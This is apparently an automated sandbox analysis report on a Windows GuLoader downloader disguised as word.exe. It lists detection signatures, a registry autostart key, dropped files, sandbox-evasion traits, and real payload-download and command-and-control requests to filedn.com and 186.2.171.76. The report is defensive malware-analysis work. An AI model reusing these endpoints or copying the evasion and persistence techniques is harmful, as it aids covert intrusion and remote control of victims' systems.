Edit tour

Windows Analysis Report
word.exe

Overview

General Information

Sample name:	word.exe
Analysis ID:	1497467
MD5:	0ea4553778672b58bbd711fb039552c8
SHA1:	8487f359428f19444696ce610ed81c6b4dd56a6a
SHA256:	910ae266eb8177aa46e2a2c77029e57b30d7aaa819c3b8451514bf1b1ae26f8d
Infos:

Detection

GuLoader

Score:	54
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected GuLoader

Creates an undocumented autostart registry key

Machine Learning detection for dropped file

Machine Learning detection for sample

Switches to a custom stack to bypass stack traces

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion NT Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64native

word.exe (PID: 9140 cmdline: "C:\Users\user\Desktop\word.exe" MD5: 0EA4553778672B58BBD711FB039552C8)

word.exe (PID: 8792 cmdline: "C:\Users\user\Desktop\word.exe" MD5: 0EA4553778672B58BBD711FB039552C8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\spherosome\preadoption\preembodiment\Unending.die	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
C:\Users\user\AppData\Local\Temp\nsh912A.tmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_GuLoader_5	Yara detected GuLoader	Joe Security
00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\word.exe, ProcessId: 8792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Run

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 74.120.9.25

Timestamp:	2024-08-22T16:13:35.638517+0200
SID:	2803270
Severity:	2
Source Port:	49794
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: word.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00151B78 CryptQueryObject,		21_2_00151B78
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00151B77 CryptQueryObject,		21_2_00151B77

Source: word.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: word.exe

Static PE information: certificate valid

Source: unknown	HTTPS traffic detected: 74.120.9.25:443 -> 192.168.11.20:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 186.2.171.76:443 -> 192.168.11.20:49795 version: TLS 1.2

Source: word.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_00405FF5 FindFirstFileA,FindClose,	0_2_00405FF5
Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	0_2_004055B1
Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_00402645 FindFirstFileA,	0_2_00402645
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00402645 FindFirstFileA,	21_2_00402645
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00405FF5 FindFirstFileA,FindClose,	21_2_00405FF5
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,	21_2_004055B1

Source: C:\Users\user\Desktop\word.exe	Code function: 4x nop then jmp 0015CB01h	21_2_0015B43C
Source: C:\Users\user\Desktop\word.exe	Code function: 4x nop then jmp 0015CCA9h	21_2_0015B43C
Source: C:\Users\user\Desktop\word.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	21_2_00153265
Source: C:\Users\user\Desktop\word.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	21_2_0015255C
Source: C:\Users\user\Desktop\word.exe	Code function: 4x nop then jmp 0015BB5Ch	21_2_00154CE4
Source: C:\Users\user\Desktop\word.exe	Code function: 4x nop then jmp 0015BB5Bh	21_2_00154CE4
Source: C:\Users\user\Desktop\word.exe	Code function: 4x nop then mov eax, dword ptr [ebp-28h]	21_2_00154CE4

Source: global traffic

HTTP traffic detected: GET /agent.ashx HTTP/1.1Host: 186.2.171.76Upgrade: websocketConnection: UpgradeSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==Sec-WebSocket-Version: 13Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover

Source: Joe Sandbox View

IP Address: 186.2.171.76 186.2.171.76

Source: Joe Sandbox View	JA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49794 -> 74.120.9.25:443

Source: global traffic

HTTP traffic detected: GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: filedn.comCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	TCP traffic detected without corresponding DNS query: 186.2.171.76
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: filedn.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /agent.ashx HTTP/1.1Host: 186.2.171.76Upgrade: websocketConnection: UpgradeSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==Sec-WebSocket-Version: 13Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover

Source: global traffic

DNS traffic detected: DNS query: filedn.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundReferrer-Policy: no-referrerX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Security-Policy: default-src 'none'; script-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG'; img-src 'self'; style-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG';Content-Type: text/html; charset=utf-8Content-Length: 2551ETag: W/"9f7-Mp+Fx3llRl+T15vdlmej7Jb+VGo"Set-Cookie: xid=e30=; path=/; samesite=lax; secure; httponlySet-Cookie: xid.sig=BzUgfgjtGT50YZcFx1QzksALeKi6x4FkK-W1U0iWT-1Ab08e5FW08ZvU_ej4h5aG; path=/; samesite=lax; secure; httponlyVary: Accept-EncodingDate: Thu, 22 Aug 2024 14:13:46 GMTConnection: close

Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://certificate.crt/
Source: word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificate.crt/localhosthttp://localhost/7
Source: word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://certificate.crt/localhostsihttp://localhost/o
Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: word.exe, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: word.exe, 00000000.00000000.860411221.0000000000409000.00000008.00000001.01000000.00000003.sdmp, word.exe, 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmp, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0?
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsps.ssl.com0_
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://186.2.171.76/agent.ashx
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://186.2.171.76/agent.ashx$
Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://186.2.171.76/agent.ashxP
Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ssl.com/repository0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443

Source: unknown	HTTPS traffic detected: 74.120.9.25:443 -> 192.168.11.20:49794 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 186.2.171.76:443 -> 192.168.11.20:49795 version: TLS 1.2

Source: C:\Users\user\Desktop\word.exe

Code function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040511A

Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_00403217
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,		21_2_00403217

Source: C:\Users\user\Desktop\word.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_00404959	0_2_00404959
Source: C:\Users\user\Desktop\word.exe	Code function: 0_2_004062CB	0_2_004062CB
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00404959	21_2_00404959
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_004062CB	21_2_004062CB
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_0015B43C	21_2_0015B43C
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_001516B1	21_2_001516B1
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00150808	21_2_00150808
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00150898	21_2_00150898
Source: C:\Users\user\Desktop\word.exe	Code function: 21_2_00154E10	21_2_00154E10

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe 910AE266EB8177AA46E2A2C77029E57B30D7AAA819C3B8451514BF1B1AE26F8D

Source: C:\Users\user\Desktop\word.exe

Code function: String function: 004029FD appears 47 times

Source: word.exe, 00000000.00000000.860475916.0000000000447000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametrichinization.exe4 vs word.exe
Source: word.exe, 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametrichinization.exe4 vs word.exe
Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametrichinization.exe4 vs word.exe

Source: word.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal54.troj.evad.winEXE@3/10@1/2

Source: C:\Users\user\Desktop\word.exe

Code function: 0_2_0040442A GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,

0_2_0040442A

Source: C:\Users\user\Desktop\word.exe

Code function: 0_2_00402036 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,

0_2_00402036

Source: C:\Users\user\Desktop\word.exe

File created: C:\Users\user\spherosome

Jump to behavior

Source: C:\Users\user\Desktop\word.exe	Mutant created: \Sessions\1\BaseNamedObjects\MeshCentralAssistantSingletonMutex
Source: C:\Users\user\Desktop\word.exe	Mutant created: NULL

Source: C:\Users\user\Desktop\word.exe

File created: C:\Users\user\AppData\Local\Temp\nsh9129.tmp

Jump to behavior

Source: word.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\word.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\word.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\word.exe

File read: C:\Users\user\Desktop\word.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
Source: C:\Users\user\Desktop\word.exe	Process created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
Source: C:\Users\user\Desktop\word.exe	Process created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"	Jump to behavior

Source: C:\Users\user\Desktop\word.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ncryptprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: netfxperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: esentprf.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: perfts.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: utildll.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: msdtcuiu.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: msdtcprx.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: mtxclu.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: clusapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: resutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: msscntrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: perfdisk.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wmiclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: perfnet.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: perfos.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: perfproc.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: sysmain.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: rasctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: tapiperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: perfctrs.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: usbperf.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\word.exe	Section loaded: rtutils.dll	Jump to behavior
